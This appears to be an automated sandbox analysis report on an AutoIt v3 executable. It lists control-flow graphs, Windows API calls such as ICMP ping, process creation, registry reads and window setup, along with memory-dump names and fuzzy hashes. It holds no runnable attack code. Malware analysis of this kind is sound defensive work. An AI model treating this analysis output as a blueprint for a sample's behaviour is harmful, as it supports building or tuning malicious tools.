• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 2214bd01da95412c114ccd4923a369a1f0aadcead7b63c008b47cda68e251683
• Instruction ID: 544bc20a07bb6e60c97458a0a7fdcaf4223a3ef3d12fb4b5725d357149a7abb4
• Opcode Fuzzy Hash: 2214bd01da95412c114ccd4923a369a1f0aadcead7b63c008b47cda68e251683
• Instruction Fuzzy Hash: 60215A71E05308AFEB20AFA5ED09B9D7BB4FB08311F00019AF504BA2A0D7B66554EF94

Control-flow Graph

control_flow_graph 927 eb5e1d-eb5e54 call e44dc0 930 eb5e56-eb5e63 call e4502b 927->930 931 eb5e74-eb5e86 WSAStartup 927->931 930->931 938 eb5e65-eb5e70 call e4502b 930->938 933 eb5e88-eb5e98 call e97135 931->933 934 eb5e9d-eb5edb call e540cd call e44d37 call e5402a inet_addr gethostbyname 931->934 942 eb5ff6-eb5ffe 933->942 948 eb5edd-eb5eea IcmpCreateFile 934->948 949 eb5eec-eb5efc call e97135 934->949 938->931 948->949 950 eb5f01-eb5f32 call e60fe6 call e5433f 948->950 954 eb5fed-eb5ff1 call e51cb6 949->954 959 eb5f55-eb5f69 IcmpSendEcho 950->959 960 eb5f34-eb5f53 IcmpSendEcho 950->960 954->942 961 eb5f6d-eb5f6f 959->961 960->961 962 eb5fa2-eb5fa4 961->962 963 eb5f71-eb5f76 961->963 964 eb5fa6-eb5fb2 call e97135 962->964 965 eb5fba-eb5fcc call e44dc0 963->965 966 eb5f78-eb5f7d 963->966 976 eb5fd4-eb5fe8 IcmpCloseHandle WSACleanup call e545ae 964->976 977 eb5fce-eb5fd0 965->977 978 eb5fd2 965->978 969 eb5f7f-eb5f84 966->969 970 eb5fb4-eb5fb8 966->970 969->962 971 eb5f86-eb5f8b 969->971 970->964 974 eb5f9a-eb5fa0 971->974 975 eb5f8d-eb5f92 971->975 974->964 975->970 979 eb5f94-eb5f98 975->979 976->954 977->976 978->976 979->964
APIs
• WSAStartup.WS2_32(00000101,?), ref: 00EB5E7E
• inet_addr.WSOCK32(?,?,?), ref: 00EB5EC3
• gethostbyname.WS2_32(?), ref: 00EB5ECF
• IcmpCreateFile.IPHLPAPI ref: 00EB5EDD
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB5F4D
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EB5F63
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EB5FD8
• WSACleanup.WSOCK32 ref: 00EB5FDE
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: a75eaacb3f0df96615d8b82082790a027be2a6ef40b845fc9b97ecaeac53ba31
• Instruction ID: bbe28ae99d786de502483462531f6efb2fa70039a2b430087a4c9119b3f8ec7e
• Opcode Fuzzy Hash: a75eaacb3f0df96615d8b82082790a027be2a6ef40b845fc9b97ecaeac53ba31
• Instruction Fuzzy Hash: 2251AC326056019FD720EF25DC49BABB7E0EF48714F18592AF995BB2E1DB70E904CB42

Control-flow Graph

control_flow_graph 981 e54d83-e54dd1 983 e54e31-e54e33 981->983 984 e54dd3-e54dd6 981->984 983->984 987 e54e35 983->987 985 e54e37 984->985 986 e54dd8-e54ddf 984->986 988 e54e3d-e54e40 985->988 989 e909c2-e909f0 call e4c460 call e4c483 985->989 990 e54de5-e54dea 986->990 991 e54ead-e54eb5 PostQuitMessage 986->991 992 e54e1a-e54e22 DefWindowProcW 987->992 993 e54e65-e54e8c SetTimer RegisterWindowMessageW 988->993 994 e54e42-e54e43 988->994 1028 e909f5-e909fc 989->1028 995 e54df0-e54df2 990->995 996 e90a35-e90a49 call ea2cce 990->996 999 e54e61-e54e63 991->999 998 e54e28-e54e2e 992->998 993->999 1002 e54e8e-e54e99 CreatePopupMenu 993->1002 1000 e90965-e90968 994->1000 1001 e54e49-e54e5c KillTimer call e55ac3 call e434e4 994->1001 1003 e54eb7-e54ec1 call e55b29 995->1003 1004 e54df8-e54dfd 995->1004 996->999 1021 e90a4f 996->1021 999->998 1007 e9096a-e9096c 1000->1007 1008 e9099e-e909bd MoveWindow 1000->1008 1001->999 1002->999 1023 e54ec6 1003->1023 1010 e90a1a-e90a21 1004->1010 1011 e54e03-e54e08 1004->1011 1015 e9098d-e90999 SetFocus 1007->1015 1016 e9096e-e90971 1007->1016 1008->999 1010->992 1018 e90a27-e90a30 call e98854 1010->1018 1019 e54e0e-e54e14 1011->1019 1020 e54e9b-e54eab call e55bd7 1011->1020 1015->999 1016->1019 1024 e90977-e90988 call e4c460 1016->1024 1018->992 1019->992 1019->1028 1020->999 1021->992 1023->999 1024->999 1028->992 1032 e90a02-e90a15 call e55ac3 call e559d3 1028->1032 1032->992
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00E54E22
• KillTimer.USER32(?,00000001), ref: 00E54E4C
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E54E6F
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E54E7A
• CreatePopupMenu.USER32 ref: 00E54E8E
• PostQuitMessage.USER32(00000000), ref: 00E54EAF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: bfdddfafa436b3f694602fa818e00edbe0cdff6999a1d876c6c0d3bc9d110789
• Instruction ID: 8e597d3fd223223b3057f250246e11dd4fa003d2b245f923cc4fe3092ab31888
• Opcode Fuzzy Hash: bfdddfafa436b3f694602fa818e00edbe0cdff6999a1d876c6c0d3bc9d110789
• Instruction Fuzzy Hash: 8841E8B1608309AFDF156F24AC0BBBA7795F74030AF143916FD01BA1D2CE61AC98A761

Control-flow Graph

APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E90C5B
  • Part of subcall function 00E51821: _memmove.LIBCMT ref: 00E5185B
• _memset.LIBCMT ref: 00E55787
• _wcscpy.LIBCMT ref: 00E557DB
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E557EB
• __swprintf.LIBCMT ref: 00E90CD1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
• String ID: Line %d: $AutoIt - $H"H"
• API String ID: 230667853-2139484885
• Opcode ID: d0f0218eeceaf8bf4f5c4a76ad81866a36d12ce0f33c529890e6731740dc8938
• Instruction ID: ba1f852fa1b2dbc7f9a0b5946de59dbfcbffe4c5aa7193b1085742f22566721b
• Opcode Fuzzy Hash: d0f0218eeceaf8bf4f5c4a76ad81866a36d12ce0f33c529890e6731740dc8938
• Instruction Fuzzy Hash: 6341B271408304AAC321EB60DC45BDFB7DCAF89355F101A5EF995B20A2EB30A64CCB92

Control-flow Graph

control_flow_graph 1172 ebfd7d-ebfdde call e63010 1175 ebfe0a-ebfe0e 1172->1175 1176 ebfde0-ebfdf3 call e4502b 1172->1176 1178 ebfe10-ebfe20 call e4502b 1175->1178 1179 ebfe55-ebfe5b 1175->1179 1184 ebfe40 1176->1184 1185 ebfdf5-ebfe08 call e4502b 1176->1185 1191 ebfe23-ebfe3c call e4502b 1178->1191 1181 ebfe5d-ebfe60 1179->1181 1182 ebfe70-ebfe76 1179->1182 1186 ebfe63-ebfe68 call e4502b 1181->1186 1187 ebfe78 1182->1187 1188 ebfe80-ebfe9a call e44d37 call e5436a 1182->1188 1192 ebfe43-ebfe47 1184->1192 1185->1191 1186->1182 1187->1188 1205 ebff59-ebff61 1188->1205 1206 ebfea0-ebfef9 call e44d37 call e5436a call e44d37 call e5436a call e44d37 call e5436a 1188->1206 1191->1179 1204 ebfe3e 1191->1204 1197 ebfe49-ebfe4f 1192->1197 1198 ebfe51-ebfe53 1192->1198 1197->1186 1198->1179 1198->1182 1204->1192 1208 ebff8b-ebffb9 GetCurrentDirectoryW call e60fe6 GetCurrentDirectoryW 1205->1208 1209 ebff63-ebff7e call e44d37 call e5436a 1205->1209 1251 ebfefb-ebff16 call e44d37 call e5436a 1206->1251 1252 ebff27-ebff57 GetSystemDirectoryW call e60fe6 GetSystemDirectoryW 1206->1252 1218 ebffbd 1208->1218 1209->1208 1222 ebff80-ebff89 call e62e2c 1209->1222 1221 ebffc1-ebffc5 1218->1221 1224 ebffc7-ebfff1 call e44f98 * 3 1221->1224 1225 ebfff6-ec0006 call ea6f95 1221->1225 1222->1208 1222->1225 1224->1225 1234 ec0008-ec0053 call ea7652 call ea7561 call ea75da 1225->1234 1235 ec0062 1225->1235 1239 ec0064-ec0068 1234->1239 1271 ec0055-ec0060 1234->1271 1235->1239 1243 ec006e-ec0099 call e98ef3 1239->1243 1244 ec0114-ec013b CreateProcessW 1239->1244 1256 ec009b-ec00a0 call e98f2e 1243->1256 1257 ec00a2 call e991cf 1243->1257 1249 ec013e-ec0151 call e6105c * 2 1244->1249 1275 ec0190-ec019c CloseHandle 1249->1275 1276 ec0153-ec018b call e97135 GetLastError call e5fdae call e44dc0 1249->1276 1251->1252 1277 ebff18-ebff21 call e62e2c 1251->1277 1252->1218 1270 ec00a7-ec00b9 call e62e2c 1256->1270 1257->1270 1285 ec00bb-ec00c0 1270->1285 1286 ec00c2-ec00d2 call e62e2c 1270->1286 1271->1239 1278 ec019e-ec01c3 call ea7205 call ea784d call ec025f 1275->1278 1279 ec01c8-ec01cc 1275->1279 1293 ec0211-ec0222 call ea702f 1276->1293 1277->1221 1277->1252 1278->1279 1287 ec01ce-ec01d8 1279->1287 1288 ec01da-ec01e4 1279->1288 1285->1285 1285->1286 1305 ec00db-ec00eb call e62e2c 1286->1305 1306 ec00d4-ec00d9 1286->1306 1287->1293 1294 ec01ec-ec020b call e44dc0 CloseHandle 1288->1294 1295 ec01e6 1288->1295 1294->1293 1295->1294 1311 ec00ed-ec00f2 1305->1311 1312 ec00f4-ec0112 call e6105c * 3 1305->1312 1306->1305 1306->1306 1311->1311 1311->1312 1312->1249
APIs
• _memset.LIBCMT ref: 00EBFD9E
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF31
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF55
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFF95
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EBFFB7
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EC0133
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EC0165
• CloseHandle.KERNEL32(?), ref: 00EC0194
• CloseHandle.KERNEL32(?), ref: 00EC020B
Memory Dump Source
• Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
• Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: e1a20e96d358bab2b529d7856de7130e4f2cb639c87a590f2c660b011f355327
• Instruction ID: ad73dfe7934eed066ad7a947766fc7030a2e44278fd4895a6f0bd5f4d4691258
• Opcode Fuzzy Hash: e1a20e96d358bab2b529d7856de7130e4f2cb639c87a590f2c660b011f355327
• Instruction Fuzzy Hash: 73E1AF31604301DFC715EF24D891B6ABBE1EF85314F18A86DF9856B2A2CB31EC45CB52

Control-flow Graph

                                                                                                          control_flow_graph 1422 e550db-e5514b CreateWindowExW * 2 ShowWindow * 2
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E55109
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E5512A
                                                                                                          • ShowWindow.USER32(00000000), ref: 00E5513E
                                                                                                          • ShowWindow.USER32(00000000), ref: 00E55147
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: 5959b77440c652bfe196bf22236dd02c62b67b3a9b3c282712aed33647932117
                                                                                                          • Instruction ID: 48cb360824fe4b02667e39d8d9f19599a2c79da720ee6b04983a5daa600f4e90
                                                                                                          • Opcode Fuzzy Hash: 5959b77440c652bfe196bf22236dd02c62b67b3a9b3c282712aed33647932117
                                                                                                          • Instruction Fuzzy Hash: DFF0B7719453987EEB3127276C4DF277F7DE7C6F50F05015AB900A62A0C6612851EEB0

                                                                                                          Control-flow Graph
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E54A8C: _fseek.LIBCMT ref: 00E54AA4
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DE1
                                                                                                            • Part of subcall function 00EA9CF1: _wcscmp.LIBCMT ref: 00EA9DF4
                                                                                                          • _free.LIBCMT ref: 00EA9C5F
                                                                                                          • _free.LIBCMT ref: 00EA9C66
                                                                                                          • _free.LIBCMT ref: 00EA9CD1
                                                                                                            • Part of subcall function 00E62F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62F99
                                                                                                            • Part of subcall function 00E62F85: GetLastError.KERNEL32(00000000,?,00E69C54,00000000,00E68D5D,00E659C3), ref: 00E62FAB
                                                                                                          • _free.LIBCMT ref: 00EA9CD9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                          • API String ID: 1552873950-2806939583
                                                                                                          • Opcode ID: 57f5c105e41e44bfff08a74b86661ca52a3f9b6e216c0ffe76182bce80cc3aa8
                                                                                                          • Instruction ID: f67098223b2d7b05359c5675e367cb1b0a591de76f5173adf1d2c9f37a72fb7d
                                                                                                          • Opcode Fuzzy Hash: 57f5c105e41e44bfff08a74b86661ca52a3f9b6e216c0ffe76182bce80cc3aa8
                                                                                                          • Instruction Fuzzy Hash: EB515FB1A04219AFDF14DF64DC41A9EBBB9FF48314F00049EB609B7241EB715E848F58
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 1559183368-0
                                                                                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                          • Instruction ID: 79c5c4d0995f088b29397f54802a6f4dcc651ad8fbe7bf4c1d244fab290895db
                                                                                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                                          • Instruction Fuzzy Hash: 2F51C732B40B05DBDB248F69E8846AE77B5AF403A4F24972AF835B62D1D770AD50DB40
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E452E6
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E4534A
                                                                                                          • TranslateMessage.USER32(?), ref: 00E45356
                                                                                                          • DispatchMessageW.USER32(?), ref: 00E45360
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1795658109-0
                                                                                                          • Opcode ID: acbb5a3ae8414be41473b4a8c6518355a322cec05538708cc4096ee21840ca00
                                                                                                          • Instruction ID: ec1ba299188337cf40baac44a9e2cd0088fea8bf94997edb2261d5e0ba31d25e
                                                                                                          • Opcode Fuzzy Hash: acbb5a3ae8414be41473b4a8c6518355a322cec05538708cc4096ee21840ca00
                                                                                                          • Instruction Fuzzy Hash: 7B313B31908709DBDB30DF64EC44BE977F8AB01748F24609AE422B71E6D3B5A845E711
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412A8
                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412C9
                                                                                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E41275,SwapMouseButtons,00000004,?), ref: 00E412EB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Control Panel\Mouse
                                                                                                          • API String ID: 3677997916-824357125
                                                                                                          • Opcode ID: 25c60cb48cb067ac00cb33653563b42205914e5ab30e4cf44bd9945f3bc2a124
                                                                                                          • Instruction ID: 2b9b275a82d94d7c21c4d89c816548beed872634417a6f4f3b5b7d6741fe6d06
                                                                                                          • Opcode Fuzzy Hash: 25c60cb48cb067ac00cb33653563b42205914e5ab30e4cf44bd9945f3bc2a124
                                                                                                          • Instruction Fuzzy Hash: 6F115A71515208BFDF208FA5EC84EEEBBB8EF05744F00559AF805E7120D2719E84A7A4
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E6593C: __FF_MSGBANNER.LIBCMT ref: 00E65953
                                                                                                            • Part of subcall function 00E6593C: __NMSG_WRITE.LIBCMT ref: 00E6595A
                                                                                                            • Part of subcall function 00E6593C: RtlAllocateHeap.NTDLL(010B0000,00000000,00000001,?,00000004,?,?,00E61003,?), ref: 00E6597F
                                                                                                          • std::exception::exception.LIBCMT ref: 00E6101C
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00E61031
                                                                                                            • Part of subcall function 00E687CB: RaiseException.KERNEL32(?,?,?,00EFCAF8,?,?,?,?,?,00E61036,?,00EFCAF8,?,00000001), ref: 00E68820
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                          • String ID: `=$h=
                                                                                                          • API String ID: 3902256705-1319648006
                                                                                                          • Opcode ID: a93b5005c5beba21e7685d0d0c27b5f7596520649c81254a58e75c2dfd00b334
                                                                                                          • Instruction ID: eea758217ada80762e080641395cf256b32f94984fbe0834c64664c34df3f89d
                                                                                                          • Opcode Fuzzy Hash: a93b5005c5beba21e7685d0d0c27b5f7596520649c81254a58e75c2dfd00b334
                                                                                                          • Instruction Fuzzy Hash: 06F0283568421DB6CB21BB68FD02ADE77ECDF01394F202556F814B2281DFB09B81C6E1
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,00ED2C4C), ref: 00EA3F57
                                                                                                          • GetLastError.KERNEL32 ref: 00EA3F66
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00EA3F75
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00ED2C4C), ref: 00EA3FD2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmp
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2267087916-0
                                                                                                          • Opcode ID: 4a7da75a367f77c9e39f044a350195807ae2ec6439867abe0828fea54b366826
                                                                                                          • Instruction ID: de981644c4aae9977da7e5234e10c0331876236586fce6631dd26e01e474d3df
                                                                                                          • Opcode Fuzzy Hash: 4a7da75a367f77c9e39f044a350195807ae2ec6439867abe0828fea54b366826
                                                                                                          • Instruction Fuzzy Hash: 1C21A774A192019F8700DF38D88199AB7F4EF5A358F105A1EF494E72A1D731AA4ACB42
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00E55B58
                                                                                                            • Part of subcall function 00E556F8: _memset.LIBCMT ref: 00E55787
                                                                                                            • Part of subcall function 00E556F8: _wcscpy.LIBCMT ref: 00E557DB
                                                                                                            • Part of subcall function 00E556F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E557EB
                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00E55BAD
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E55BBC
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E90D7C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmp
